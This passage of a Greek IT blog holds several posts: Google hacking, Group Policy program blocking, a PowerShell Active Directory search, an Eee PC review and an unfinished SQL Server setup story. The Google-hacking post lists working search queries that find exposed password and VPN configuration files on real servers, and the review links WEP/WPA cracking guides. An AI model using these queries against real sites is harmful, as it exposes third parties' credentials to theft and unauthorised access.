    http://securitydistro.com/gallery/100/BackTrack-3-Final-Screenshots.php

    http://www.offensive-security.com/ (BackTrack's official site)

    Back to back...following your track...I'm using...Linux Backtrack!

    Don't you try...and don't deny...cause Backtrack will make you cry.
  12. Blackman
    Το Google είναι ένα εργαλείο πλέον για την ζωή μας, αν και πρόσφατα η Microsoft δημιούργησε το bing.com, πολλοί από εμάς χρησιμοποιούμε ακόμα φανατικά την μηχανή του Google.
    Πολλοί έχουμε ακούσει τον όρο “Google hack”. Ναι οκ. Δηλαδή τι γίνεται; Πως γίνεται; Τι ακριβώς είναι, δεν νομίζω ότι έχουμε απαντήσει πολλοί σε αυτό.
    Για αυτό ήρθα εγώ να σας βάλω λίγο στην ιδέα. Η μηχανή του Google μας δίνει την δυνατότητα (ναι όλοι μπορούμε να το κάνουμε) να ψάξουμε σε κάθε τι που υπάρχει στο Internet, δίνοντας στον απλό χρήστη με την χρήση κάποιων ‘εντολών’ να περάσει μέσα από τρύπες που έχουν οι web servers.
    Ας δούμε όμως κάποια παραδείγματα.
    Sample 1
    Πηγαίνετε στο Google και γράψτε…
    intitle: "index of" mp3
    όπου ουσιαστικά φαίνεται καθαρά το τι γράφω. Φέρε μου τις σελίδες όπου στον τίτλο έχουν την λέξη “Index Of” και περιέχει πληροφορίες με όνομα mp3.

    τα αποτελέσματα που μας φέρνει είναι

    και πηγαίνοντας σε μία σελίδα βλέπουμε πχ

    Αν πληκτρολογήσετε το παραπάνω θα δείτε ότι την συγκεκριμένη εντολή την χρησιμοποιούν πολλοί για να βρουν αρχεία, από συγκεκριμένες σελίδες με την συγκεκριμένη περιγραφή.
    Sample 2
    Μία άλλη ενδιαφέρουσα εντολή είναι η
    !Host=*.* intext:enc_UserPassword=* ext:pcf
    όπου στην συγκεκριμένη περίπτωση βάζω pcf για να μου επιστρέψει configuration files για Cisco routers.

    μας φέρνει κάποια αποτελέσματα

    και επιλέγοντας πχ το πρώτο, μας έρχεται το παγωτό στο χέρι…

    Ωραία…τι έχουμε τώρα; Έχουμε το configuration file για τον Cisco router του European University Institute, το οποίο το σώζουμε σαν pcf στο pc μας και αν έχετε Cisco VPN Client, το βάζετε και συνδέεστε στο σύστημα τους. Δεν μπαίνετε μέσα, καθώς θα ζητήσει username και password, αλλά έχετε κάνει το πρώτο connection. Από εκεί και πέρα είναι θέμα επιπέδου γνώσεων το πως μπορεί κάποιος να εκμεταλλευτεί αυτό που μόλις ανέφερα.
    Sample 3
    Μία πιο περίπλοκη εντολή όπως η παρακάτω…
    "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
     
     
     
    δείτε τι κάνει. Αναζητεί τους web servers που έχουν δημιουργηθεί με FrontPage και ζητάμε να δούμε τα password που εμπεριέχει το αρχείο που αναφέρετε ως service.pwd

    τα αποτελέσματα που μας φέρνει είναι τα εξής:

    όπου τυχαία κλικάροντας σε κάποιες σελίδες έχουμε αποτελέσματα όπως…


    στα παραπάνω φαίνεται καθαρά ότι αυτό που έψαξε, αυτό βρήκε. Δηλαδή στο Url να εμπεριέχεται το service.pwd.
    Εντυπωσιακό ε;
    --------------
    Φυσικά οι εντολές που μπορείτε να χρησιμοποιήσετε στο google είναι πραγματικά πολλές και με λίγο ψάξιμο δεν θα δυσκολευτείτε να τις βρείτε. Αλλά να θυμάστε ότι αρκετές από αυτές τις εντολές λειτουργούν και στις υπόλοιπες search engines.
    Για να έχετε καλύτερη γεύση…
    μπορείτε να δείτε και εντολές όπως οι παρακάτω:
    "your password is" filetype:log allinurl: admin mdb ext:inc "pwd=" "UID=" ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn filetype:dat "password.dat" filetype:inc intext:mysql_connect filetype:log inurl:"password.log" eggdrop filetype:user user intext:"enable secret 5 $" inurl:/db/main.mdb Σε γενικές γραμμές βλέπετε ότι υπάρχουν κάποιες σταθερές εντολές, όπου ο καθένας μπορεί να κάνει αναζήτηση. Έτσι με το filetype αναζητάς για τύπους αρχείων, με το Intext να εμπεριέχεται σε κείμενο η λέξη που θα βάλουμε, ενώ με το inurl να εμπεριέχεται στο URL.
    Υπάρχουν όμως και ποιο πολύπλοκες εντολές αναζήτησης, όπως ενδεικτικά σας παραθέτω…
    "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help –forum filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" intitle:"SuSE Linux Openexchange Server" "Please activate Javascript!" intitle:"teamspeak server-administration intitle:"Tomcat Server Administration" intitle:"TOPdesk ApplicationServer" intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu -----------------------------------------
    Ευελπιστώ μετά από αυτό το blog post, να αποκτήσατε μία εικόνα για το τι εστί google hacking. Καταλαβαίνετε ότι το Google Hack δεν είναι κάτι διαφορετικό από μία μεγάλη γκάμα vulnerability exploits. Από εκεί και πέρα είναι στο θέμα του χρήστη για το πως θα το χρησιμοποιήσει.
    Για ότι άλλο θέλετε απλά…Google It…
  13. Blackman
    Αρχικά να αναφέρω ότι αυτή είναι η πρώτη φορά που γράφω blog και ελπίζω να συνεχιστεί. Εξαρτάται από τα σχόλια σας για να να γίνει αυτό.

    -----

    ΄Μπαίνοντας στο θέμα μας τώρα...

    "Θέλουμε ISA server", ήταν εδώ και αρκετό το αίτημα του τμήματος IT προς την διοίκηση, μαζί με όλες τις εξηγήσεις για το 'τι είναι;' ένας ISA.

    Παρόλα αυτά, η λύση έπρεπε να βρεθεί ώστε να περιοριστεί το πρόβλημα. Ποιο ήταν το πρόβλημα; Οι χρήστες που είχαν το MSN και όχι απλά μιλούσαν αλλά και αντάλλαζαν αρχεία, μεγάλου μεγέθους πολλές φορές, με αποτέλεσμα η σύνδεση με τον έξω κόσμο να γίνετε τρομερά αργή. Η πρώτη σκέψη που έρχεται είναι το Group Policy. Έχοντας ενεργοποιημένο policy για την αποτροπή download μέσω του Internet Explorer (αναγκαστικά όταν οι χρήστες σου βλέπουν το δίκτυο σαν ένα καλό τρόπο για να κατεβάσουν ότι Torrent υπάρχει στο διαδίκτυο), έπρεπε να ενεργοποιηθεί και το policy για να 'κοπεί' και το MSN.

    Ανατρέχοντας στην λίστα των policies, θα βρείτε εύκολα το Policy του Messenger. ΠΡΟΣΟΧΗ!!! Μιλάμε για το Windows Messenger, το οποίο βρίσκεται στο Administrator Templates -> Windows Components -> Windows Messenger (είστε στο User ή στο Computer Configuration).

    Το πρόβλημα είναι όμως, ότι οι περισσότεροι χρήστες 'δουλεύουν' με τον Live Messenger. Με την παραπάνω διαδικασία απενεργοποιείς τον 'βασικό' των Windows. Τι κάνεις όμως όταν υπάρχει εγκατεστημένος ο Live;

    Εξαρχής η σωστή κίνηση ήταν να είχε απενεργοποιηθεί από τον χρήστη την δυνατότητα να κάνει εγκαταστάσεις, οπότε δεν θα υπάρχει και το παραπάνω πρόβλημα. Αν, όμως αυτό δεν έχει γίνει από την αρχή, τότε η λύση είναι άλλη. Αναζητώντας στο Internet για να βρω "deny program from running through group policy" (και διάφορους άλλους τρόπους-λέξεις κλειδιά αναζήτησης), κατέληξα στο σημείο ότι πάρα πολλοί administrators θέλουν να το κάνουν, αλλά ελάχιστοι είναι αυτοί που το κάνουν χωρίς την χρήση ενός ISA server.

    Σε συνδυασμό με το παραπάνω, αποφάσισα ότι οι χρήστες δεν θα ήθελα να τρέχουν άλλον browser και δη τον Mozilla, για τον λόγο που ανέφερα. Να μην κατεβάζουν τίποτα. (Είπαμε, δεν υπάρχει ISA Server) Οπότε η διαδικασία που θα πρέπει να ακολουθηθεί είναι η ίδια.

    Windows Settings->Security Settings->Software Restrictions->Additional Rules (είτε στο User ή στο Computer Configuration)

    εκεί κάνουμε δεξί κλικ



    και οι επιλογές που εμφανίζονται είναι άκρως ενδιαφέρουσες, για να κόψετε το...βήχα σε αρκετούς.

    Αυτό που μας ενδιαφέρει περισσότερο σε αυτή την φάση είναι το New Path Rule και διαλέγουμε το path όπου βρίσκετε το πρόγραμμα που δεν θέλουμε ο χρήστης να τρέχει.



    Αντίστοιχα και για τον Mozilla κάνουμε το ίδιο πράγμα και όταν ενεργοποιηθεί το policy ο χρήστης βλέπει:



    Καλή φάση...ε;

    Στην περίπτωση που κάποιος 'έξυπνος' χρήστης αποφασίσει να βάλει σε ένα usb flash stick τον Firefox Portable, οπότε και οι πολιτικές που αναφέρθησαν δεν θα τον επιρρεάζουν, η λύση είναι μέσω ενός New Hash Rule.

    Όπου με αυτό τον τρόπο από οπουδήποτε και να τρέξει το πρόγραμμα και οποιοδήποτε όνομα να έχει το αρχείο, ο σύστημα βλέπει το Hash και το αποτρέπει από το να τρέξει. (ΠΡΟΣΟΧΗ) Φυσικά αυτό περιορίζεται σε επίπεδο έκδοσης του προγράμματος, οπότε αν ο χρήστης τρέξει άλλη έκδοση του προγράμματος σημαίνει αυτόματα και άλλο hash key.

    Παρόλα αυτά, αυτός είναι ένας τρόπος για να περιορίσεις τους χρήστες χωρίς την χρήση ενός ISA Server και ελπίζω ότι απαντάει σε όσους ψάχνουν τρόπο για να αποτρέψουν ένα πρόγραμμα να τρέξει.

    Δεν έχω να προσθέσω τίποτα άλλο κύριε πρόεδρε...
  14. Blackman
    Έχετε ένα Domain... ή ένα Forest...ή ένα ολόκληρο Εθνικό Δρυμό; Το Active Directory σας φαίνεται λίγο μπελαλίδικο κατά την αναζήτηση κάποιου OU;

    Πρόσφατα χρειάστηκε να κάνω μία δουλίτσα στο AD στην εταιρεία μου και καλώς ή κακώς (μάλλον η ηλικία φταίει), δεν έβρισκα το OU που έψαχνα. Αντί να κάθομαι να κάνω expand ένα ένα τα OUs για να δω που είναι μέσα, βρήκα ένα όμορφο script που μπορείτε να τρέξετε μέσα σε Powershell και να αναζητήσετε το OU που ψάχνετε.
    $strFilter = "(&(objectCategory=organizationalUnit)(name=*Sales*'))"

    $objDomain = New-Object System.DirectoryServices.DirectoryEntry

    $objSearcher = New-Object System.DirectoryServices.DirectorySearcher
    $objSearcher.SearchRoot = $objDomain
    $objSearcher.PageSize = 1000
    $objSearcher.Filter = $strFilter

    $colProplist = "name"
    foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}

    $colResults = $objSearcher.FindAll()

    foreach ($objResult in $colResults)
    {$objItem = $objResult.Properties; $objItem.name}    
  15. Blackman
    Το άκρως επιτυχημένο event που οργάνωσε το Autoexec.gr με τίτλο IT Pro Connections είναι παρελθόν. Σε αυτό το event μου δόθηκε η πρώτη μου ευκαιρία να παρουσιάσω κάτι σε τόσο απαιτητικό κοινό. Πέραν της ικανοποίησης κάτι τέτοιου, καθώς είναι και ψώνιο μου το να εκτίθεμαι μπροστά σε κόσμο, ήρθε μία ακόμα αναγνώριση αυτής της προσπάθειας.
    Η εταιρεία που εργάζομαι κάθε χρόνο βραβεύει τους υπαλλήλους της που κάνουν κάτι …παραπάνω. Είτε αυτό είναι στην εκπαίδευση (είχα πάρει το πρώτο όταν είχα στα χέρια μου το μεταπτυχιακό μου, αλλά και αργότερα όταν έγινα MCP και μετά MCSA), είτε σε κάποια πρόταση βελτίωσης, είτε κάπου αλλού. Για το σκοπό αυτό έχει κατηγοριοποιήσει κάποια πράγματα στα οποία έχουν αποφασίσει να βραβεύουν τους υπαλλήλους που κάνουν κάτι το αντίστοιχο.
    Φέτος αρχικά είχα απογοητευτεί που δεν είχα βραβευτεί μαζί με όλους τους υπόλοιπους για την αναβάθμιση του τίτλου MCSA μου σε WS 2008. Αλλά έπρεπε να περιμένω μέχρι το τέλος για να καταλάβω ότι δεν με είχαν στην απ’ έξω.
    Έτσι είχα την τιμή να πάρω το βραβείο ΠΡΩΤΟΒΟΥΛΙΑΣ για την επιτυχημένη παρουσίαση μου στο IT Pro Connections και την γενικότερη ενασχόληση μου με το κομμάτι του Interoperability, αλλά και τις συνεχόμενες πιστοποιήσεις πάνω στα συστήματα της Microsoft. Φυσικά το βραβείο το συνόδευε και ένα πολύ καλό δώρο.
    Δεν είναι το βραβείο, αλλά η αναγνώριση σε αυτό που κάνει κάποιος. Έτσι και εμένα το συγκεκριμένο απλά μου δίνει μία επιπλέον ώθηση (όχι ότι την χρειαζόμουν, αλλά μου μεγαλώνει λίγο το χαμόγελο) για να συνεχίσω να προσφέρω και να ασχολούμαι με πράγματα που μου αρέσουν τόσο πολύ.
    Φυσικά δεν γινόταν να μην το μοιραστώ με όλους εσάς. Άλλη μία φορά να ευχαριστήσω το Autoexec.gr και τον Νάσο Κλαδάκη, για την τιμή που μου έκαναν και στην συνέχεια της Διοίκηση της εταιρείας Βάμβας που εργάζομαι για την επιβράβευση αυτής της προσπάθειας.
    Γιώργος “Blackman” Καββαλάκης
    Υ.Γ. Τα καλά να λέγονται!!!
  16. Blackman
    Εντυπωσιασμένος από αυτά που μάθαμε στο SecurityForum που μόλις τελείωσε (δυστυχώς), παρατηρούσα εμείς εδώ στο autoexec.gr τι έχουμε αναφέρει για το θέμα που έχει να κάνει με την προστασία. Έχουμε αναφέρει αρκετά πράγματα που οι φίλοι μας Andy και Marcus μας είπα αυτές τις δύο ημέρες.

    Να δούμε τι ήταν αυτά και τι έχουμε πει εμείς εδώ μέσα;

    1) Μας ανέφεραν για πολλά εργαλεία για να προστατευθούμε, να μαζέψουμε πληροφορίες και γενικά να σκεφτόμαστε σαν ένας hacker. Μα και εμείς είχαμε αναφέρει ένα από τα πιο δυνατά εργαλεία για να γίνει αυτό. Μιλάω για το Backtrack (ναι ναι...ξέρω ότι ευλογώ τα μούσια μου) το οποίο περιέχει το 90% των εργαλείων που αναφέρθηκαν στο forum. Διαβάστε ΕΔΩ

    2) Μας ανέφεραν επίσης για το ότι δεν πρέπει να βάζουμε τις πληροφορίες μας στο Internet και αν αυτό συμβαίνει, ας είναι όσο λιγότερες γίνεται. Ειδικότερα οι πληροφορίες που μπορεί κάποιος να μαζέψει μέσω Social Networking sites (όπως το Facebook) είναι πάρα πολλές. Ρίξτε μία ματιά ΕΔΩ

    3) Φυσικά μας έκαναν και μία επίδειξη exploit που ήταν άκρως εντυπωσιακό, αλλά και ο φίλος μας ο spanougakis μας είχε αναφέρει και μας είχε δείξει και από κοντά με τον ίδιο τρόπο. Για να σας θυμήσω απλά δείτε ΕΔΩ

    4) Μήπως δεν μας είπαν και για το BitLocker των Vista που ο φίλτατος frees (α ρε ξαδερφάκι) έχει αναφέρει ΕΔΩ?

    5) Η μήπως δεν μας ανέφεραν για Certificates (PKI κλπ) που ο φίλος dimitris έχει ξεκινήσει και αναλύει ΕΔΩ και ΕΔΩ?

    6) Ένα από τα πράγματα που ακούσαμε είχαν να κάνουν και με τα ασύρματα δίκτυα τα οποία αναφέρει ο spanougakis ΕΔΩ

    7) Ενώ ένα ακόμα πράγμα που ακούσαμε αρκετές φορές είχαν να κάνουν με τις πολιτικές δικτύου. Αλλά και εγώ είχα αναφέρει για κάτι σχετικό ΕΔΩ για να περιορίσουμε τους χρήστες να κάνουν "λάθη" ή κακόβουλες κινήσεις, που όπως μάθαμε φέρουν το μεγαλύτερο ποσοστό security breach ενός δικτύου.

    8) Τέλος, για την μικρή αναφορά μου να πω και για τον Hyper(visor)-Vangelis που έχει γράψει για τον 2008 RC2, και μας ανέφεραν επίσης οι φίλοι μας Andy & Marcus, το οποίο μπορείτε να διαβάσετε ΕΔΩ

    Φυσικά, αυτά απλά είναι ένα μικρό μέρος από αυτά που είδαμε και μάθαμε από τους φίλους μας, αλλά θεώρησα σωστό να αναφέρω το τι έχουμε γράψει εδώ μέσα, γιατί κατά την γνώμη μου προχωράμε σε ένα σωστό δρόμο. Πραγματικά το SecurityForum άξιζε τα λεφτά του και με έκανε να δω αρκετά πράγματα με άλλο μάτι. Νομίζω ότι το όλο συναίσθημα που μου άφησε αυτό το διήμερο ήταν πολύ δυνατό και με έκανε να αγαπήσω περισσότερο αυτό που κάνω.

    Ανυπομονώ για το επόμενο και έχω ήδη καεί στην προσπάθεια να εφαρμόσω ότι έμαθα σε συνδιασμό με ότι ήξερα.

    Autoexec.gr RULEZ
  17. Blackman
    Από πέρυσι στην αγορά των φορητών υπολογιστών έχει ξεκινήσει μία νέα μόδα με τα extra super duper mobile notebooks, χαμηλού κόστους. Όλοι ξέρετε το Eee PC, αλλά και πολλά άλλα αντίστοιχα όπως το MSI Wind ή άλλα που έχει βγάλει η Asus και κάποιες άλλες εταιρείες.



    Εγώ θα σας περιγράψω την δική μου εμπειρία με το λατρεμένο μου Eee PC 701 4G.

    Η πρώτη μου επαφή ήταν καλή. Το μέγεθος μου 'έκανε' (λογικό εφόσον έχω συνηθίσει να σερφάρω και από το κινητό), τα πλήκτρα ήθελαν λίγο προσαρμογή, το ασύρματο πιάνει δύο φορές καλύτερα από ότι άλλο μηχάνημα με ασύρματη λήψη έχω βάλει δίπλα, ενώ ο χώρος του δίσκου παρόλο στην αρχή που μου φαινόταν ανύπαρκτος, πλέον μου φαίνεται παραπάνω από επαρκής (μιλάμε για 4GB δίσκου με λειτουργικό και με partition για restore).

    Ο λόγος όμως που το αγάπησα, θα το μάθετε ευθύς αμέσως, όπως επίσης και το τι μπορείς να κάνεις με ένα laptop σαν το 701 (πλέον πουλιέται γύρω στα 170ε).

    Να αναφέρω ότι το σύστημα πωλείται με δύο λειτουργικά για να διαλέξετε και αυτά είναι τα Windows XP Home ή το Linux Xandros (χρησιμοποιεί τον πυρήνα Χ και το υπόλοιπο είναι από το όνομα του ελληνικού νησιού μας την Άνδρο). Εγώ επέλεξα το linux σύστημα και λόγω κόστους (πιο φτηνό), αλλά και λόγο ότι έχω δουλέψει σε Linux και ήξερα ότι δεν θα αντιμετοπίσω πρόβλημα σε οτιδήποτε (φυσικά μπορείτε να κάνετε εγκατάσταση ΟΤΙ λειτουργικό θέλετε).

    Όταν ξεκίνησε για πρώτη φορά το σύστημα ήρθα σε αυτή την οθόνη:



    Τι είναι τουτ; Αναρωτήθηκα. Και βουρ ξεκίνησα να ψάχνω για να δω τι υπάρχει στο σύστημα. Η αλήθεια είναι ότι το παραπάνω γραφικό περιβάλλον είναι άκρως βολικό και έχει την ονομασία Easy Mode. Από τις ρυθμίσεις μπορείς να μπεις και να βάλεις ή να βγάλεις προγράμματα τα οποία τα κατεβάζεις από τους servers της Asus.

    Για τους ΜΗ γνώστες των Linux συστημάτων, να τους αναφέρω ότι όλες οι διανομές Linux(Ubuntu, Fedora, Xandros, Debian κλπ) δουλεύουν με την χρήση repositories. Αυτά τα repositories δεν κάνουν τίποτα άλλο από το να σε συνδέουν σε repository servers και να σας στέλνουν μία λίστα με όλα τα διαθέσιμα προγράμματα-παιχνίδια ή ότι άλλο έχει το εκάστοτε repository και εσύ απλά επιλέγεις τι θες να κατεβάσεις και να εγκαταστήσεις. Φυσικά όλα αυτά που είναι διαθέσιμα είναι OPEN SOURCE και συνεπώς FREE OF CHARGE.

    Γυρνόντας όμως στο θέμα, να αναφέρω ότι τα repositories της Asus είναι απαράδεκτα. Οπότε οι επιλογές που έχει ένας χρήστης το τι να βάλει στο σύστημα είναι περιορισμένες. Οι πρώτες μου σκέψεις ήταν να βγάλω το λειτουργικό και να βάλω κάτι άλλο, αλλά με λίγο ψάξιμο βρήκα πως να δουλέψω πάνω στο xandros.

    Το πρώτο βήμα ήταν να ενεργοποιήσω το ADVANCED MODE. Τι είναι αυτό; Μα εννοείτε ένα πιο φιλικό και γνωστό περιβάλλον για τους περισσότερους. Δείτε τι εννοώ...



    Για να γίνει αυτό πρέπει να ακολουθήσετε τις οδηγίες που αναφέρονται εδώ.

    Φυσικά κάνοντας αυτό δεν χάνετε το Easy Mode, αλλά πλέον έχετε την δυνατότητα να αλλάζετε μεταξύ των δύο modes όποτε θέλετε.

    Επόμενο βήμα ήταν φυσικά να προσθέσω repositories που να είναι συμβατά με το σύστημα. Παρακάτω βλέπετε το εργαλείο Synaptic Package Manager (κάτι σαν το Add/Remove Programs) που από τις ρυθμίσεις του είναι ένα από τους τρόπους για να προστεθούν repositories και μετά να τα δείτε στην λίστα του synaptic για να προσθαφερέσετε προγράμματα.



    Αυτό μπορείτε να το κάνετε ακολουθόντας αυτό τον οδηγό

    Επιπλέον repositories μπορείτε να βρείτε στις σελίδες:

    http://cccclinuxsig.pbwiki.com/Safe%...20Repositories
    http://www.geekconnection.org/repositories.htm
    http://www.newlinuxuser.com/howto-ad...es-to-xandros/


    Μόλις έβαλα τα repositories, το party ξεκίνησε. Έπρεπε να διαλέξω τι θέλω, αλλά και τι πραγματικά μου χρειάζετε να κάνω εγκατάσταση.

    Αρχικά έκανα εγκατάσταση το πακέτο aircrack-ng (όχι δεν είμαι κακό παιδί)

    και ΕΔΩ μπορείτε να δείτε πως να το χρησιμοποιήσετε για WEP cracking, ενώ ΕΔΩΩΩΩΩΩ ΓΙΑ WPA/WPA2 cracking.

    Μετά αποφάσισα να χρησιμοποιήσω το ήδη εγκατεστημένο remote desktop που έχει διαθέσιμο και να δοκιμάσω να συνδεθώ στον Win Vista υπολογιστή μου.

    Δείτε και μία εικόνα πως είναι



    Όλα καλά μέχρι εδώ. Το σύστημα μπορεί και συνδεέτε κανονικά

    Μετά σκεφτόμουν ότι θα ήθελα να κάνω εγκατάσταση και κανένα παιχνιδάκι. Υπάρχουν διάφορα τα οποία μπορείτε να βάλετε και είναι open source και έχουν ενδιαφέρον (πχ SuperTux,Gweled), αλλά εγώ εκτός από μερικά που έβαλα, έβαλα και το KXMAME



    Ωραίο πράγμα ε; Πήγα και στην σελίδα http://www.rom-world.com/dl.php?name=MAME και ξεκίνησα το κατέβασμα. Να προσθέσω ότι στο σύστημα μου έχω βάλει και μία 2gb SD RAM στην οποία έβαλα και όλα τα MAME παιχνίδια.

    Η επόμενη κίνηση είναι να βάλω ένα σωστό IM. Το σύστημα έχει εγκατεστημένο το Pidgin το οποίο συνεργάζεται με τα περισσότερα γνωστά IM προγράμματα, επίσης εγκατεστημένο θα βρείτε και το Skype. Εγώ όμως ήθελα να χρησιμοποιήσω την κάμερα που έχει το σύστημα, αλλά και να βάλω ένα άλλο IM πρόγραμμα που είχα δουλέψει στο παρελθόν. Αυτό το πρόγραμμα είναι το aMSN, το οποίο είναι η open source μορφή του MSN, με τα περισσότερα πράγματα που κάνει και η official έκδοση.



    Φυσικά το έκανα εγκατάσταση, καθότι μέσα από τα repositories υπήρχε ακόμα και η τελευταία έκδοση του προγράμματος. (καμία φορά, χρειάζετε να περάσει λίγες μέρες για να ενημερωθούν όλοι οι servers με μία καινούρια έκδοση ενός προγράμματος. Σε αυτή την περίπτωση μπορείτε να πάτε στην ιστοσελίδα του προγράμματος που θέλετε και να το κατεβάσετε από εκεί, χωρίς να περιμένετε)

    Συνεχίζοντας όμως και δοκιμάζοντας στο msn, έβαλα αρχικά να δοκιμάσω να μιλήσω και δούλευε μία χαρά. Όταν επέλεξα να ενεργοποιήσω την κάμερα, μάλλον 'έφαγα' άκυρο. Όμως ο Blackman δεν καταθέτει τα όπλα έτσι απλά και με εκτεταμένη αναζήτηση βρήκα την λύση και η οποία είναι πολύ απλή. 

    Από κονσόλα γράψτε

    sudo -s
    sudo /sbin/modprobe uvcvideo
    echo 1 > /proc/acpi/asus/camera


    και μετά ξεκινήστε το aMSN. Η κάμερα πλέον δουλεύει κανονικά και με τον νόμο. (Για όσους δεν ξέρουν η εντολή sudo, είναι το αντίστοιχο Run As Administrator που έχουν πλέον τα Vista. Είναι μία λειτουργία την οποία την έχουν τα linux λειτουργικά παααααρα πολά χρόνια και τελικά και η MS την πρόσθεσε στο δικό της πρόσφατα.)

    Μετά θυμήθηκα ότι δεν είχα εγκαταστήσει τα Ελληνικά, το οποίο το έκανα με βάση αυτόν τον οδηγό

    Στην συνέχεια έκανα εγκατάσταση περισσότερους codecs για να παίζουν όλες οι ταινίες όπως το βρήκα ΕΔΩ

    Τέλος στα εργαλεία που εγκατέστησα ήταν και το vpnc (vpn client για cisco routers), για να μπορώ να συνδέομαι μέσω vpn στην εταιρεία μου και να ρίχνω μία ματιά. Όμως ήταν δύσκολο να συνδεθώ στον cisco της εταιρείας γιατί προφανώς δεν δούλευα σωστά το πρόγραμμα. Βρήκα τελικά ένα οδηγό, αλλά τελικά δεν κατάφερα να συνδεθώ και έχω ακόμα πρόβλημα (θα το βρω όμως που θα μου πάει). Πάντως αν θέλει κάποιος να το χρησιμοποιήσει υπάρχουν διάφορα στο internet όπως:

    Αυτό που χρησιμοποίησα και ήμουν πολύ κοντά στο να συνδεθώ (!!!) ήταν ακολουθόντας το http://www.math.dartmouth.edu/software/resources_Linux/vpn/vpnc.html

    παρόλα αυτά υπάρχουν και άλλα

    http://www.debuntu.org/how-to-connect-to-a-cisco-vpn-using-vpnc

    https://wiki.phys.ethz.ch/readme/vpnc_with_linux

    http://femto.cs.uiuc.edu/~sbond/vpnc/

    -------------------------

    Το Eee PC 701 4G που έχω στην κατοχή μου κρατάει με την μπαταρία γύρω στις 2 ώρες (αρχικά ήταν γύρω στις 2:30 ώρες, αλλά έπεσε από την χρήση).

    Σε γενικές γραμμές υπάρχουν πάρα πολλά που μπορείτε να κάνετε με ένα laptop αυτής της κατηγορίας. Συνηστώ την αγορά του σαν backup σύστημα, αλλά και σαν εργαλείο άκρως φορητό. Πλέον έχω κάνει εγκατάσταση στο κινητό μου και το JoikuSpot και πλέον έχω internet όπου και να πάω. (Το JoikuSpot κάνει το κινητό σας WiFi HotSpot και μπορείτε να συνδέσετε μέσω αυτού ότι θέλετε και είτε να έχετε δίκτυο ή να χρησιμοποιήσετε την 3G/GPRS σύνδεση του κινητού σας για να έχετε Internet)

    Αν έχετε στην κατοχή σας οποιοδήποτε Eee PC μπορείτε να βρείτε βοήθεια για οτιδήποτε από την σελίδα www.eeeuser.com

    Επίσης όποιος θέλει να βάλει παραπάνω μνήμη (για το 701) να υπολογίζετε ότι το σύστημα βλέπει μέχρι 1gb. Αν βάλετε 2gb θα πρέπει να κάνετε recompile τον πυρήνα με τον οδηγό ΑΥΤΟ και ισχύει για όλα τα μοντέλα της σειράς 700.

    ΤΟ RECOMPILATION ΠΡΕΠΕΙ ΝΑ ΓΙΝΕΙ ΣΤΗΝ ΑΡΧΗ ΠΡΩΤΟΥ ΞΕΚΙΝΗΣΕΤΕ ΤΙΣ ΕΓΚΑΤΑΣΤΑΣΕΙΣ

    Καλές αγορές...

    ΥΓ Πολύ πλάκα έχει όταν δουλέψετε το voice command... COMPUTER MUSIC...COMPUTER EMAIL...COMPUTER MESSENGER...COMPUTER ΦΤΙΑΞΕ ΚΑΦΕ...
  18. Blackman
    Όλοι ξέρουμε τον Microsoft SQL Server 2000.

     
    Οι περισσότεροι ξέρουμε το Business ERP της Singular Logic.

     
    Κάποιοι ξέρουμε και κάποιο Warehouse Management σύστημα.

     
     
    Θα σας διηγηθώ μέσω αυτού του άρθρου την διαδικασία εγκατάστασης ενός WMS συστήματος σε μία εταιρεία που δουλεύει με το Business ERP σε SQL 2000.
     
    Ας ξεκινήσουμε όμως με την απλή ερώτηση. Γιατί SQL server 2000 και όχι 2005 (ή 2008)? Πολύ απλά γιατί η εταιρεία έχει αγοράσει τον 2000 και δεν θέλει να διαθέσει λεφτά για αγορά του 2005 ή γιατί μας αρέσει καλύτερα ο 2000 (μας θυμίζει τα παλιά).
     
    Η επιλογή του ERP στο συγκεκριμένο άρθρο έχει γίνει λόγω ότι το πρόβλημα που θα περιγράψω μεταξύ αυτών των τριών συστημάτων είναι και αυτό που έζησα.
     
    Αρχική Κατάσταση
     
    SQL server 2000 (χωρίς Service Pack) εγκατεστημένο σε Windows 2003 server. (database server)
    Οι βάσεις του Business ERP βρίσκονται σε αυτόν τον server, ενώ το application κομμάτι βρίσκετε σε άλλο server.
    Με αυτό το configuration τα πάντα δουλεύουν κανονικά και χωρίς πρόβλημα.
     
    Παρατηρήσεις: Εγκατάσταση του SP δεν είχε γίνει καθότι στις θεωρούμενες μεγάλες εγκαταστάσεις του Business ERP ο SQL 2000 βγάζει προβλήματα αν έχει εγκατεστημένο SP (το SP4 συγκεκριμένα). Το βασικό πρόβλημα είναι ότι κολλάει και δεν κάνει commit κάποια transactions, οπότε και όλο το σύστημα του ERP μέσα στην εταιρεία κολλάει αντίστοιχα. Το παραπάνω είναι επιβεβαιωμένο σε αρκετές εγκαταστάσεις με βάση το feedback που υπάρχει από εξωτερικούς συνεργάτες της Singular Logic.

    Στόχος

    Εγκατάσταση-προσάρτηση WMS συστήματος που συνδέεται με το ERP και χρησιμοποιεί φορητά τερματικά (pdas) για το scanning των barcodes των ειδών της αποθήκης.
     
    Βήματα που ακολουθήθηκαν
     
    Εγκατάσταση του WMS συστήματος σε ένα ξεχωριστό server με εγκατεστημένο τον IIS για να μπορεί να δουλεύει το management κομμάτι της εφαρμογής που γίνετε μέσω browser. Η WMS εφαρμογή είναι γραμμένη σε .NET.
    Παραμετροποίηση του σχετικού config αρχείου για να βλέπει τον database server.
    Δοκιμή της σύνδεσης που ακολουθείται με αποτυχία αυτής.
     
    Μετά από πολλές δοκιμές παρατηρείτε το ότι δεν υπάρχει σύνδεση με τον server σε κανένα επίπεδο. Ούτε με telnet, το οποίο δεν γίνετε ΟΥΤΕ τοπικά.
